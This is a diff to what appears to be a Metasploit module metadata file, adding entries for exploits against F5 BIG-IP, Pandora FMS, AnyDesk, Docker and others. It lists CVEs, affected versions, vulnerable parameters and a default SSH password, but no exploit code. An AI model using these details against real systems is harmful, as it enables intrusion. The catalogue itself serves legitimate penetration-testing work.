+      "Mikhail Klyuchnikov",
      "Project Zero India",
      "TrustedSec",
      "James Brytan",
@@ -52652,7 +53543,8 @@
      "EDB-47901",
      "EDB-47902",
      "URL-https://support.citrix.com/article/CTX267027/",
-      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/",
+      "URL-https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/"
    ],
    "platform": "Python,Unix",
    "arch": "python, cmd",
@@ -52676,7 +53568,7 @@
      "Python",
      "Unix Command"
    ],
-    "mod_time": "2020-04-20 20:06:52 +0000",
+    "mod_time": "2020-07-08 14:36:42 +0000",
    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/citrix_dir_traversal_rce",
@@ -54382,7 +55274,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2020-05-21 16:31:45 +0000",
+    "mod_time": "2020-06-27 14:51:54 +0000",
    "path": "/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/eyesofnetwork_autodiscovery_rce",
@@ -54403,6 +55295,69 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/f5_bigip_tmui_rce": {
+    "name": "F5 BIG-IP TMUI Directory Traversal and File Upload RCE",
+    "fullname": "exploit/linux/http/f5_bigip_tmui_rce",
+    "aliases": [
+
+    ],
+    "rank": 200,
+    "disclosure_date": "2020-06-30",
+    "type": "exploit",
+    "author": [
+      "Mikhail Klyuchnikov",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a directory traversal in F5's BIG-IP Traffic\n          Management User Interface (TMUI) to upload a shell script and execute\n          it as the Unix root user.\n\n          Unix shell access is obtained by escaping the restricted Traffic\n          Management Shell (TMSH). The escape may not be reliable, and you may\n          have to run the exploit multiple times. Sorry!\n\n          Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,\n          15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced\n          in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.\n\n          Tested against the VMware OVA release of 14.1.2.",
+    "references": [
+      "CVE-2020-5902",
+      "URL-https://support.f5.com/csp/article/K52145254",
+      "URL-https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-08-14 21:06:07 +0000",
+    "path": "/modules/exploits/linux/http/f5_bigip_tmui_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_bigip_tmui_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/f5_icall_cmd": {
    "name": "F5 iControl iCall::Script Root Command Execution",
    "fullname": "exploit/linux/http/f5_icall_cmd",
@@ -54614,6 +55569,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/geutebruck_testaction_exec": {
+    "name": "Geutebruck testaction.cgi Remote Command Execution",
+    "fullname": "exploit/linux/http/geutebruck_testaction_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-05-20",
+    "type": "exploit",
+    "author": [
+      "Davy Douhine"
+    ],
+    "description": "This module exploits an authenticated arbitrary command execution vulnerability within the 'server'\n          GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,\n          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware\n          versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.\n          Successful exploitation results in remote code execution as the root user.",
+    "references": [
+      "CVE-2020-16205",
+      "URL-http://geutebruck.com",
+      "URL-https://ics-cert.us-cert.gov/advisories/icsa-20-219-03",
+      "URL-https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "armle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-08-15 00:56:53 +0000",
+    "path": "/modules/exploits/linux/http/geutebruck_testaction_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/geutebruck_testaction_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/github_enterprise_secret": {
    "name": "Github Enterprise Default Session Secret And Deserialization Vulnerability",
    "fullname": "exploit/linux/http/github_enterprise_secret",
@@ -55154,13 +56160,14 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by\n          an unauthenticated attacker to achieve remote code execution as root.\n          The first is an unauthenticated bypass, followed by a command injection as the server user,\n          and finally abuse of an insecure default password.\n          This module exploits all three vulnerabilities, giving the attacker a root shell.\n          At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too.",
+    "description": "IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by\n          an unauthenticated attacker to achieve remote code execution as root.\n          The first is an unauthenticated bypass, followed by a command injection as the server user,\n          and finally abuse of an insecure default password.\n          This module exploits all three vulnerabilities, giving the attacker a root shell.\n          At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM.\n          The authentication bypass works on versions <= 2.0.6.1, but the command injection should only work on\n          versions <= 2.0.4 according to IBM.",
    "references": [
      "CVE-2020-4427",
      "CVE-2020-4428",
      "CVE-2020-4429",
      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
-      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33",
+      "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/"
    ],
    "platform": "Linux",
    "arch": "x86, x64",
@@ -55181,9 +56188,9 @@
      "https"
    ],
    "targets": [
-      "IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)"
+      "IBM Data Risk Manager <= 2.0.4"
    ],
-    "mod_time": "2020-05-05 10:54:33 +0000",
+    "mod_time": "2020-06-26 11:38:55 +0000",
    "path": "/modules/exploits/linux/http/ibm_drm_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ibm_drm_rce",
@@ -56330,6 +57337,69 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/mida_solutions_eframework_ajaxreq_rce": {
+    "name": "Mida Solutions eFramework ajaxreq.php Command Injection",
+    "fullname": "exploit/linux/http/mida_solutions_eframework_ajaxreq_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-07-24",
+    "type": "exploit",
+    "author": [
+      "elbae",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in Mida\n          Solutions eFramework version 2.9.0 and prior.\n\n          The `ajaxreq.php` file allows unauthenticated users to inject\n          arbitrary commands in the `PARAM` parameter to be executed as\n          the apache user. The sudo configuration permits the apache user\n          to execute any command as root without providing a password,\n          resulting in privileged command execution as root.\n\n          This module has been successfully tested on Mida Solutions\n          eFramework-C7-2.9.0 virtual appliance.",
+    "references": [
+      "CVE-2020-15920",
+      "EDB-48768",
+      "URL-https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "UNIX (cmd)"
+    ],
+    "mod_time": "2020-09-11 17:16:10 +0000",
+    "path": "/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/mida_solutions_eframework_ajaxreq_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/multi_ncc_ping_exec": {
    "name": "D-Link/TRENDnet NCC Service Command Injection",
    "fullname": "exploit/linux/http/multi_ncc_ping_exec",
@@ -57149,7 +58219,7 @@
    "targets": [
      "Python"
    ],
-    "mod_time": "2020-05-22 16:53:44 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/linux/http/netsweeper_webadmin_unixlogin.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netsweeper_webadmin_unixlogin",
@@ -57209,7 +58279,7 @@
    "targets": [
      "Nexus Repository Manager <= 3.21.1"
    ],
-    "mod_time": "2020-04-22 10:44:07 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb",
    "is_install_path": true,
    "ref_name": "linux/http/nexus_repo_manager_el_injection",
@@ -57483,6 +58553,59 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/pandora_fms_events_exec": {
+    "name": "Pandora FMS Events Remote Command Execution",
+    "fullname": "exploit/linux/http/pandora_fms_events_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-06-04",
+    "type": "exploit",
+    "author": [
+      "Fernando Catoira",
+      "Julio Sanchez",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a vulnerability (CVE-2020-13851) in Pandora\n          FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps\n          older versions) in order to execute arbitrary commands.\n\n          This module takes advantage of a command injection vulnerability in the\n          `Events` feature of Pandora FMS. This flaw allows users to execute\n          arbitrary commands via the `target` parameter in HTTP POST requests to\n          the `Events` function. After authenticating to the target, the module\n          attempts to exploit this flaw by issuing such an HTTP POST request,\n          with the `target` parameter set to contain the payload. If a shell is\n          obtained, the module will try to obtain the local MySQL database\n          password via a simple `grep` command on the plaintext\n          `/var/www/html/pandora_console/include/config.php` file.\n\n          Valid credentials for a Pandora FMS account are required. The account\n          does not need to have admin privileges.\n          This module has been successfully tested on Pandora 7.0 NG 744 running\n          on CentOS 7 (the official virtual appliance ISO for this version).",
+    "references": [
+      "CVE-2020-13851",
+      "URL-https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "Linux (cmd)"
+    ],
+    "mod_time": "2020-07-09 17:24:19 +0000",
+    "path": "/modules/exploits/linux/http/pandora_fms_events_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_fms_events_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_fms_exec": {
    "name": "Pandora FMS Remote Code Execution",
    "fullname": "exploit/linux/http/pandora_fms_exec",
@@ -61498,7 +62621,7 @@
      "h00die",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)\n        which contains a vulnerability where it may improperly perform sign\n        extension. This can be utilized to escalate privileges.\n\n        The target system must be compiled with BPF support and must not have\n        kernel.unprivileged_bpf_disabled set to 1.\n\n        This module has been tested successfully on:\n\n        Debian 9.0 kernel 4.9.0-3-amd64;\n        Deepin 15.5 kernel 4.9.0-deepin13-amd64;\n        ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\n        Fedora 25 kernel 4.8.6-300.fc25.x86_64;\n        Fedora 26 kernel 4.11.8-300.fc26.x86_64;\n        Fedora 27 kernel 4.13.9-300.fc27.x86_64;\n        Gentoo 2.2 kernel 4.5.2-aufs-r;\n        Linux Mint 17.3 kernel 4.4.0-89-generic;\n        Linux Mint 18.0 kernel 4.8.0-58-generic;\n        Linux Mint 18.3 kernel 4.13.0-16-generic;\n        Mageia 6 kernel 4.9.35-desktop-1.mga6;\n        Manjero 16.10 kernel 4.4.28-2-MANJARO;\n        Solus 3 kernel 4.12.7-11.current;\n        Ubuntu 14.04.1 kernel 4.4.0-89-generic;\n        Ubuntu 16.04.2 kernel 4.8.0-45-generic;\n        Ubuntu 16.04.3 kernel 4.10.0-28-generic;\n        Ubuntu 17.04 kernel 4.10.0-19-generic;\n        ZorinOS 12.1 kernel 4.8.0-39-generic.",
+    "description": "Linux kernel prior to 4.14.8 contains a vulnerability in the Berkeley\n          Packet Filter (BPF) verifier. The `check_alu_op` function performs\n          incorrect sign extension which allows the verifier to be bypassed,\n          leading to arbitrary kernel read/write.\n\n          The target system must be compiled with BPF support and permit\n          unprivileged access to BPF with `kernel.unprivileged_bpf_disabled`\n          not set to 1.\n\n          This module has been tested successfully on:\n\n          Debian 9.0 kernel 4.9.0-3-amd64;\n          Deepin 15.5 kernel 4.9.0-deepin13-amd64;\n          ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\n          Fedora 24 kernel 4.5.5-300.fc24.x86_64;\n          Fedora 25 kernel 4.8.6-300.fc25.x86_64;\n          Fedora 26 kernel 4.11.8-300.fc26.x86_64;\n          Fedora 27 kernel 4.13.9-300.fc27.x86_64;\n          Gentoo 2.2 kernel 4.5.2-aufs-r;\n          Linux Mint 17.3 kernel 4.4.0-89-generic;\n          Linux Mint 18.0 kernel 4.8.0-58-generic;\n          Linux Mint 18.3 kernel 4.13.0-16-generic;\n          Mageia 6 kernel 4.9.35-desktop-1.mga6;\n          Manjero 16.10 kernel 4.4.28-2-MANJARO;\n          Solus 3 kernel 4.12.7-11.current;\n          Ubuntu 14.04.1 kernel 4.4.0-89-generic;\n          Ubuntu 16.04.2 kernel 4.8.0-45-generic;\n          Ubuntu 16.04.3 kernel 4.10.0-28-generic;\n          Ubuntu 17.04 kernel 4.10.0-19-generic;\n          ZorinOS 12.1 kernel 4.8.0-39-generic.",
    "references": [
      "BID-102288",
      "CVE-2017-16995",
@@ -61528,7 +62651,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-07-17 10:06:42 +0000",
    "path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -61699,7 +62822,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-02-16 14:53:16 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
@@ -61755,6 +62878,47 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/local/docker_privileged_container_escape": {
+    "name": "Docker Privileged Container Escape",
+    "fullname": "exploit/linux/local/docker_privileged_container_escape",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-07-17",
+    "type": "exploit",
+    "author": [
+      "stealthcopter"
+    ],
+    "description": "This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release\n              feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.",
+    "references": [
+      "EDB-47147",
+      "URL-https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/",
+      "URL-https://github.com/stealthcopter/deepce"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, armle, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-07-30 17:35:30 +0000",
+    "path": "/modules/exploits/linux/local/docker_privileged_container_escape.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/docker_privileged_container_escape",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/exim4_deliver_message_priv_esc": {
    "name": "Exim 4.87 - 4.91 Local Privilege Escalation",
    "fullname": "exploit/linux/local/exim4_deliver_message_priv_esc",
@@ -61788,7 +62952,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-07-18 10:00:14 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -63609,6 +64773,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/misc/cve_2020_13160_anydesk": {
+    "name": "AnyDesk GUI Format String Write",
+    "fullname": "exploit/linux/misc/cve_2020_13160_anydesk",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-16",
+    "type": "exploit",
+    "author": [
+      "scryh",
+      "Spencer McIntyre"
+    ],
+    "description": "The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially\n          crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the\n          discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On\n          successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.",
+    "references": [
+      "CVE-2020-13160",
+      "URL-https://devel0pment.de/?p=1881"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": 50001,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Anydesk 5.5.2 Ubuntu 20.04 x64",
+      "Anydesk 5.5.2 Ubuntu 18.04 x64"
+    ],
+    "mod_time": "2020-07-01 15:27:33 +0000",
+    "path": "/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/cve_2020_13160_anydesk",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/misc/drb_remote_codeexec": {
    "name": "Distributed Ruby Remote Code Execution",
    "fullname": "exploit/linux/misc/drb_remote_codeexec",
@@ -64697,7 +65912,7 @@
      "Minions (Python payload)",
      "Minions (Unix command)"
    ],
-    "mod_time": "2020-05-29 12:24:14 +0000",
+    "mod_time": "2020-07-05 11:15:50 +0000",
    "path": "/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/saltstack_salt_unauth_rce",
@@ -65255,7 +66470,7 @@
      "Linux (Debian5 3.2.5-4lenny6)",
      "Debugging Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/linux/samba/chain_reply.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/chain_reply",
@@ -65314,7 +66529,7 @@
      "Linux SPARC64",
      "Linux s390x"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-05-07 21:06:49 +0000",
    "path": "/modules/exploits/linux/samba/is_known_pipename.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/is_known_pipename",
@@ -65366,7 +66581,7 @@
      "Linux Heap Brute Force (OpenWRT MIPS)",
      "DEBUG"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/linux/samba/lsa_transnames_heap.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/lsa_transnames_heap",
@@ -65419,7 +66634,7 @@
      "2:3.5.6~dfsg-3squeeze6 on Debian Squeeze",
      "3.5.10-0.107.el5 on CentOS 5"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-04 16:08:32 +0000",
    "path": "/modules/exploits/linux/samba/setinfopolicy_heap.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/setinfopolicy_heap",
@@ -65464,7 +66679,7 @@
    "targets": [
      "Samba 2.2.x - Bruteforce"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-04 16:08:32 +0000",
    "path": "/modules/exploits/linux/samba/trans2open.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/trans2open",
@@ -65926,11 +67141,12 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module abuses a known default password in IBM Data Risk Manager. The 'a3user'\n          has the default password 'idrm' and allows an attacker to log in to the virtual appliance\n          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.\n          At the time of disclosure, this is a 0day. Versions <= 2.0.3 are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too.",
+    "description": "This module abuses a known default password in IBM Data Risk Manager. The 'a3user'\n          has the default password 'idrm' and allows an attacker to log in to the virtual appliance\n          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.\n          At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM.\n          Versions <= 2.0.6.1 are confirmed to be vulnerable.",
    "references": [
      "CVE-2020-4429",
      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
-      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33",
+      "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -65942,9 +67158,9 @@

    ],
    "targets": [
-      "IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)"
+      "IBM Data Risk Manager <= 2.0.6.1"
    ],
-    "mod_time": "2020-05-05 10:16:46 +0000",
+    "mod_time": "2020-06-26 11:28:21 +0000",
    "path": "/modules/exploits/linux/ssh/ibm_drm_a3user.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/ibm_drm_a3user",
@@ -69329,9 +70545,10 @@
    "type": "exploit",
    "author": [
      "Snyk",
-      "sinn3r <sinn3r@metasploit.com>"
+      "sinn3r <sinn3r@metasploit.com>",
+      "ggkitsas"
    ],
-    "description": "This is a generic arbitrary file overwrite technique, which typically results in remote\n        command execution. This targets a simple yet widespread vulnerability that has been\n        seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.\n        The idea is that often archive extraction libraries have no mitigations against\n        directory traversal attacks. If an application uses it, there is a risk when opening an\n        archive that is maliciously modified, and result in the embedded payload to be written\n        to an arbitrary location (such as a web root), and result in remote code execution.",
+    "description": "This is a generic arbitrary file overwrite technique, which typically results in remote\n          command execution. This targets a simple yet widespread vulnerability that has been\n          seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.\n          The idea is that often archive extraction libraries have no mitigations against\n          directory traversal attacks. If an application uses it, there is a risk when opening an\n          archive that is maliciously modified, and result in the embedded payload to be written\n          to an arbitrary location (such as a web root), and result in remote code execution.",
    "references": [
      "URL-https://snyk.io/research/zip-slip-vulnerability"
    ],
@@ -69347,7 +70564,7 @@
    "targets": [
      "Manually determined"
    ],
-    "mod_time": "2019-09-12 07:43:54 +0000",
+    "mod_time": "2020-09-02 17:14:30 +0000",
    "path": "/modules/exploits/multi/fileformat/zip_slip.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/zip_slip",
@@ -69676,7 +70893,7 @@
    "targets": [
      "Automatic (PHP-Dropper)"
    ],
-    "mod_time": "2020-06-18 15:05:02 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/multi/http/agent_tesla_panel_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/agent_tesla_panel_rce",
@@ -70067,6 +71284,58 @@
    },
    "needs_cleanup": true
  },
+  "exploit_multi/http/atutor_upload_traversal": {
+    "name": "ATutor 2.2.4 - Directory Traversal / Remote Code Execution, ",
+    "fullname": "exploit/multi/http/atutor_upload_traversal",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-05-17",
+    "type": "exploit",
+    "author": [
+      "liquidsky (JMcPeters)",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an arbitrary file upload vulnerability together with\n          a directory traversal flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in\n          order to execute arbitrary commands.\n\n          It first creates a zip archive containing a malicious PHP file. The zip\n          archive takes advantage of a directory traversal vulnerability that will\n          cause the PHP file to be dropped in the root server directory (`htdocs`\n          for Windows and `html` for Linux targets). The PHP file contains an\n          encoded payload that allows for remote command execution on the\n          target server. The zip archive can be uploaded via two vectors, the\n          `Import New Language` function and the `Patcher` function. The module\n          first uploads the archive via `Import New Language` and then attempts to\n          execute the payload via an HTTP GET request to the PHP file  in the root\n          server directory. If no session is obtained, the module creates another\n          zip archive and attempts exploitation via `Patcher`.\n\n          Valid credentials for an ATutor admin account are required. This module\n          has been successfully tested against ATutor 2.2.4 running on Windows 10\n          (XAMPP server).",
+    "references": [
+      "CVE-2019-12169",
+      "URL-https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto",
+      "Linux",
+      "Windows"
+    ],
+    "mod_time": "2020-07-01 14:43:15 +0000",
+    "path": "/modules/exploits/multi/http/atutor_upload_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atutor_upload_traversal",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_multi/http/auxilium_upload_exec": {
    "name": "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
    "fullname": "exploit/multi/http/auxilium_upload_exec",
@@ -70172,6 +71441,59 @@
    },
    "needs_cleanup": true
  },
+  "exploit_multi/http/baldr_upload_exec": {
+    "name": "Baldr Botnet Panel Shell Upload Exploit",
+    "fullname": "exploit/multi/http/baldr_upload_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-12-19",
+    "type": "exploit",
+    "author": [
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This module exploits an arbitrary file upload vulnerability within the Baldr\n          stealer malware control panel when uploading victim log files (which are uploaded\n          as ZIP files). Attackers can turn this vulnerability into an RCE by first\n          registering a new bot to the panel and then uploading a ZIP file containing\n          malicious PHP, which will then uploaded to a publicly accessible\n          directory underneath the /logs web directory.\n\n          Note that on versions 3.0 and 3.1 the ZIP files containing the victim log files\n          are encoded by XORing them with a random 4 byte key. This exploit module gets around\n          this restriction by retrieving the IP specific XOR key from panel gate before\n          uploading the malicious ZIP file.",
+    "references": [
+      "URL-https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
+      "URL-https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/",
+      "URL-https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto",
+      "<= v2.0",
+      "v2.2",
+      "v3.0 & v3.1"
+    ],
+    "mod_time": "2020-08-06 11:18:39 +0000",
+    "path": "/modules/exploits/multi/http/baldr_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/baldr_upload_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_multi/http/bassmaster_js_injection": {
    "name": "Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution",
    "fullname": "exploit/multi/http/bassmaster_js_injection",
